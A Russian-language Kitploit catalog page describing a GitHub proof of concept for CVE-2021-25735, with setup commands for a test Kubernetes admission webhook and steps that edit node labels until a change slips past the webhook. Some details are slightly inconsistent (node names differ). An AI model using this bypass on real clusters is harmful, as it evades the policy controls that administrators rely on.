Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-25735 — Эксплойт для CVE-2021-25735, демонстрирующий обход Validating Admission Webhook в Kubernetes через манипуляцию метками node, с разворачиваемым Docker-контейнером и скриптами регистрации webhook. | Kitploit
Инструменты/GitHubGitHub/darryk10/cve-2021-25735
Безопасность контейнеровАнализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеБезопасность облачных сред
GitHubdarryk10/cve-2021-25735

CVE-2021-25735

Эксплойт для CVE-2021-25735, демонстрирующий обход Validating Admission Webhook в Kubernetes через манипуляцию метками node, с разворачиваемым Docker-контейнером и скриптами регистрации webhook.

Репозиторий
17525 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-25735

Эксплуатация CVE-2021-25735: Обход проверяющего вебхука допуска Kubernetes

Настройка уязвимой среды

Начнем с запуска скрипта gencerts.sh для генерации TLS-сертификатов и ключей.
bash gencerts.sh

Для развертывания контроллера допуска необходимо локально собрать образ Docker-контейнера, присвоить ему тег и отправить образ в свой Dockerhub с помощью следующих команд.
docker login
docker build -t validationwebhook:1.0 .
docker tag validationwebhook:1.0 darryk/dev:1.0
docker push darryk/dev:1.0

Теперь вы можете развернуть созданный образ с приложением Node.js в своем кластере K8s. Файл webhook-deploy.yaml развернет все необходимые компоненты в вашем кластере.
kubectl apply -f webhook-deploy.yaml

Теперь зарегистрируем наш вебхук в API-сервере Kubernetes. Для этого создадим Base64-представление файла ca.crt, созданного ранее, и заменим CA_BUNDLE в файле webhook-registration.yaml.
cat ca.crt | base64

Наконец, мы зарегистрируем вебхук в API-сервере Kubernetes.
kubectl apply -f webhook-registration.yaml

Эксплуатация CVE-2021-25735

Мы вносим изменение в метку узла с помощью редактирования узлов и добавляем новую метку.
kubectl edit nodes ip-172-20-61-82.ec2.internal

root@kitploit:~
  labels:  
    test: test  
    changeAllowed: "false"

Поскольку ChangeAllowed установлено в "false", мы получаем следующую ошибку:

error: nodes "ip-172-20-46-130.ec2.internal" could not be patched: admission webhook "validationwebhook.validationwebhook.svc" denied the request: Validation failed You can run kubectl replace -f /tmp/kubectl-edit-irc64.yaml to try this update again.

Если мы повторим попытку изменить узел, выполнив следующие изменения:\

root@kitploit:~
  labels:  
    test: test  
    changeAllowed: "true"

В этом случае действие по редактированию было принято, обойдя контроллер допуска.

Скачать инструмент